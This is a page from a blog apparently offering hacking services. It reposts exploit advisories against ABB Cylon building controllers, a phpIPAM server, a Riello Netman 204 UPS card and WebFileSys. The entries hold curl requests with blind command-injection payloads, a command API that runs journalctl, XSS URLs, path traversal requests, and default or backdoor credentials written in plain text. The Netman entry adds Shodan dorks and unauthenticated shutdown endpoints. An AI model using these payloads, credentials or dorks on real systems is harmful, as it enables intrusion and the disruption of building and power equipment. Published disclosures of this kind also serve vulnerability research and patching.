Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863102227

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: A vulnerability was identified in a PHP script where an off-by-one
error in array access could lead to undefined behavior and potential DoS.
The issue arises in a loop that iterates over an array using a < condition,
allowing access to an out-of-bounds index. This can trigger errors or unexpected
behavior when processing data, potentially crashing the application. Successful
exploitation of this vulnerability can lead to a crash or disruption of service,
especially if the script handles large data sets. This issue can be triggered
via the rowCount POST parameter in the Electronic Security Control device update
script.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5902
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php
CVE ID: CVE-2024-48844
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/escDevicesUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2511531337&\
> escid1=192.168.1.1&\
> remove1=0&\
> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\
> remove2=0&\
> etc.
> etc.


$ cat escDevicesUpdate.php
...
...
$ini = INI::read($comproperties);

unset($ini['comm']['esc-ip-addr']);

$rowCount = $_POST['rowCount'];

for ($i = 1; $i < $rowCount; $i++) {
    $fieldEscid = "escid" . $i;
    $fieldRemove = "remove" . $i;
    if ($_POST[$fieldRemove] != 1) {
        $escid = trim($_POST[$fieldEscid]);
        $ini['comm']['esc-ip-addr'][$i] = $escid;
    }
}

if (!INI::write($comproperties, $ini)) {
    logWarning("ESC device listt modification FAILED");
    $myLine = __LINE__;
    errorCall($myLine);
}
...
HireHackking 
ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
blind command injection vulnerability. Input passed to several POST parameters
is not properly sanitized when writing files, allowing attackers to execute
arbitrary shell commands on the system. There is also an off-by-one error in
array access that could lead to undefined behavior and potential DoS.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5903
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php
CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCount=2&\
> ip1=192.168.1.1&\
> port1=47808&\
> hexMask1=0xFFFF&\
> remove1=0&\
> ip2=192.168.1.2&\
> port2=47809&\
> hexMask2=0xFFFF; sleep 17; #&\
> remove2=0&\
> submit=Submit

$ curl http://192.168.73.31/bbmdUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "rowCountNAT=2&\
> NATip1=192.168.1.1&\
> NATport1=2222&\
> NAThexMask1=0xFFFF&\
> NATremove1=7&\
> NATip2=192.168.1.2&\
> NATport2=2223&\
> NAThexMask2=0xFFFF; sleep 17; #&\
> NATremove2=0&\
> submit=Submit
HireHackking 
# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu Windows
# CVE : CVE-2023-24657
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22


    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"



[Replace Your Domain Name]
HireHackking 
ABB Cylon Aspect 3.08.03 (CookieDB) SQL Injection
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an SQL injection through the
key and user parameters. These inputs are not properly sanitized and do not
utilize stored procedures, allowing attackers to manipulate SQL queries and
potentially gain unauthorized access to the database or execute arbitrary SQL
commands.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5900
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5900.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ ./sqli.py -2 CookieDb.java
removeUserCookie()  -> DELETE FROM Cookies WHERE Key=\"" + key + "\"" + " AND " + "User" + "=\"" + user + "\"";
getAllUserCookies() -> SELECT * FROM Cookies WHERE User=\"" + user + "\"";
HireHackking

ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure

HACKER · %s · %s

# Exploit Tiltle: ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series Firmware: <=9.3.4 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: An authenticated attacker can access sensitive information via the system logs page of ABB Cylon FLXeon controllers. The logs expose critical data, including the OpenSSL password for stored certificates. This information can be leveraged for further attacks, such as decrypting encrypted communications, impersonation, or gaining deeper system access. Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5920 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5920.php CVE ID: CVE-2024-48852 CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48852 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -k "https://7.3.3.1/api/cmds" \ # JS > /diagnostics/logs-system (platform-dist) > -H "Cookie: user_sid=xxx" \ > -d "{\"cmd\":\"journalctl -b -r --no-hostname ^| head -c 600000 \"}" -- Logs begin at Thu 2024-06-13 10:58:03 EDT, end at Mon 2024-09-09 09:10:33 EDT. -- Feb 13 12:38:26 node[5810]: at endReadableNT (_stream_readable.js:1059:12) Feb 13 12:38:26 node[5810]: at IncomingMessage.emit (events.js:207:7) Feb 13 12:38:26 node[5810]: at emitNone (events.js:105:13) Feb 13 12:38:26 node[5810]: at IncomingMessage.onEnd (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:273:7) Feb 13 12:38:26 node[5810]: at done (/home/MIX_CMIX/node-server/node_modules/raw-body/index.js:213:7) Feb 13 12:38:26 node[5810]: at invokeCallback (/home/MIX_CMIX/node-serve"} ... ... Sep 09 09:10:33 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" Sep 09 09:08:18 node[5810]: cmd = openssl req -x509 -passin pass:c*******2 -key /usr/local/aam/node-server//certs/cbxi.key.pem -new -sha256 -out /usr/local/aam/node-server//certs/cbxi.cert.pem -subj "/C=IE/ST=/L=Dublin/O=Cylon Controls/OU=/CN=" Sep 09 09:00:12 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' Sep 09 08:59:58 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/aam/node-server/certs/cbxi.csr.pem' Sep 09 08:59:41 node[5810]: Error: ENOENT: no such file or directory, stat '/usr/local/ ... ...
HireHackking

ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery

HACKER · %s · %s

# Exploit title: ABB Cylon FLXeon 9.3.4 Limited Cross-Site Request Forgery # Vendor: ABB Ltd. # Product web page: https://www.global.abb # Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series Firmware: <=9.3.4 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: A CSRF vulnerability has been identified in the ABB Cylon FLXeon series. However, exploitation is limited to specific conditions due to the server's CORS configuration (Access-Control-Allow-Origin: * without Access-Control-Allow-Credentials: true). The vulnerability can only be exploited under the following scenarios: Same Domain: The attacker must host the malicious page on the same domain as the target server. Man-in-the-Middle (MitM): The attacker can intercept and modify traffic between the user and the server (e.g., on an unsecured network). Local Area Network (LAN) Access: The attacker must have access to the same network as the target server. Subdomains: The attacker can host the malicious page on a subdomain if the server allows it. Misconfigured CORS: The server’s CORS policy is misconfigured to allow certain origins or headers. Reflected XSS: The attacker can exploit a reflected XSS vulnerability to execute JavaScript in the context of the target origin. Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5918 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5918.php
HireHackking

ABB Cylon FLXeon 9.3.4 - Default Credentials

HACKER · %s · %s

ABB Cylon FLXeon 9.3.4 Default Credentials Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: FLXeon Series (FBXi Series, FBTi Series, FBVi Series) CBX Series (FLX Series) CBT Series CBV Series ABB UC32 Series Main Plant Controllers (Cylon's UnitronUC32.xx) Firmware: <=9.3.4 Summary: BACnet® Smart Building Controllers. ABB's BACnet portfolio features a series of BACnet® IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ building management solutions. ABB BACnet controllers are designed for intelligent control of HVAC equipment such as central plant, boilers, chillers, cooling towers, heat pump systems, air handling units (constant volume, variable air volume, and multi-zone), rooftop units, electrical systems such as lighting control, variable frequency drives and metering. The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented connectivity and open integration for your building automation systems. It's scalable, and modular, allowing you to control a diverse range of HVAC functions. Desc: The ABB Cylon FLXeon BACnet controller uses a weak set of default administrative credentials that can be guessed in remote password attacks and gain full control of the system. Tested on: Linux Kernel 5.4.27 Linux Kernel 4.15.13 NodeJS/8.4.0 Express Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2025-5919 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5919.php 21.04.2024 -- $ cat project P R O J E C T .| | | |'| ._____ ___ | | |. |' .---"| _ .-' '-. | | .--'| || | _| | .-'| _.| | || '-__ | | | || | |' | |. | || | | | | || | ____| '-' ' "" '-' '-.' '` |____ ░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ cat cyloncreds.txt admin:cylonctl cxpro:siteguide UC32Net:CylonCtl
HireHackking

Netman 204 - Remote command without authentication

HACKER · %s · %s

# Exploit Title: Netman 204 - Remote command with out authentication # Date: 2/4/2025 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204) # Version: netman-204 # Tested on: Windows/Linux Step 1 : Attacker can using these dorks then can find the UPS panel . Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin # We Found Two panel Yellow and blue Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups . Yellow Panel : username and password : eurek Some exploits for that : http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek or https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek Due to flaws in parameter validation, the URL can be shortened to: http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek or https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek Blue Panel : username and password : admin Some Critical leaks without authentication we can see : http://IP/administration-commands.html http://IP/administration.html http://IP/administration.html# http://IP/administration.html#LDAP http://IP/administration.html#active-users http://IP/administration.html#firmware-upgrade http://IP/configuration.html http://IP/history.html http://IP/index.html http://IP/login.html http://IP/system-overview.html http://IP/table.html #With using up paths we can see the details of the UPS without authentication . First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :) Some Remote commands without authentication : http://IP/administration-commands.html http://IP/administration-commands.html# http://IP/administration-commands.html#reboot-irms http://IP/administration-commands.html#reboot-mdu http://IP/administration-commands.html#reboot-xts http://IP/administration-commands.html#shutdown http://IP/administration-commands.html#shutdown-irms http://IP/administration-commands.html#shutdown-mdu http://IP/administration-commands.html#shutdown-restore http://IP/administration-commands.html#shutdown-restore-irms http://IP/administration-commands.html#shutdown-restore-mdu http://IP/administration-commands.html#shutdown-restore-xts http://IP/administration-commands.html#shutdown-xts http://IP/administration-commands.html#shutdownrestore http://IP/administration-commands.html#switch-irms http://IP/administration-commands.html#switch-on-bypass http://IP/administration-commands.html#test-battery
HireHackking

WebFileSys 2.31.0 - Directory Path Traversal

HACKER · %s · %s

# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter # Date: Nov 25, 2024 # Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee # Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html # Software Link: http://www.webfilesys.de/webfilesys-home/download.html # Version: 2.31.0 # Tested on: macOS # CVE : CVE-2024-53586 GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1 Host: www.webfilesys.de Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Priority: u=0, i Te: trailers Connection: keep-alive
HireHackking

ProConf 6.0 - Insecure Direct Object Reference (IDOR)

HACKER · %s · %s

